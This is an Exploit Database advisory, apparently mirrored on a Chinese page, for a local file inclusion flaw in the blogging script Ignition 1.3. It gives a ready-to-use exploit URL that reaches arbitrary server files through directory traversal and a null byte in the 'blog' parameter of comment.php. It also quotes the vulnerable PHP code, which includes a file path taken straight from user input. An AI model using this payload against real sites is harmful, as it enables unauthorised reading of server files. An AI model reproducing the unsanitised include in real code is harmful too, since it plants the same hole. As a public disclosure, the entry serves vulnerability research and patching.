Ignition 1.3 – ‘comment.php’ Local File Inclusion

• Exploit Database
• 6 阅读

• 作者： n0n0x
  日期： 2011-01-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15917/

• #######################################################
  #Ignition 1.3 <=== Local File Include
  #######################################################
  #By n0n0x
  #Homepage: http://priasantai.uni.cc/
  #Download script :http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
  #######################################################
  =========================================
  xpl : 
  http://site.com/comment.php?blog=../../../../../../../../../../LFI%00
  
  <?php 
  session_start();
  require ('data/settings.php');
  include ('data/posts/'.$_GET['blog'].'.txt'); <== LFI vuln
  ?>
  =========================================
  #######################################################
  #Greetz: all member | manadocoding.org - sekuritiOnline.net
  #
  # friends: angky.tatoki, EA ngel, bL4Ck_3n91n3,0pa, x0r0n, team_elite, thama,
  #devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet
  ######################################################